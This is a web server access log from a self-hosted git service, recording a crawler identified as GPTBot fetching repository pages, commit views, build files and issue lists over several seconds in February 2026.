"/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23801] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13839] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:16:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=alphabetically" [Client 74.7.227.38] [Length 5085] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" -[17/Feb/2026:16:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10945] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:16:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:16:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:16:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:16:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20003] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:16:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:16:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14713] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=open" -[17/Feb/2026:16:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15111] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15111] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 15717] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:16:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15254] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15182] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:16:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11395] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:16:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" -[17/Feb/2026:16:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" -[17/Feb/2026:16:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16832] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 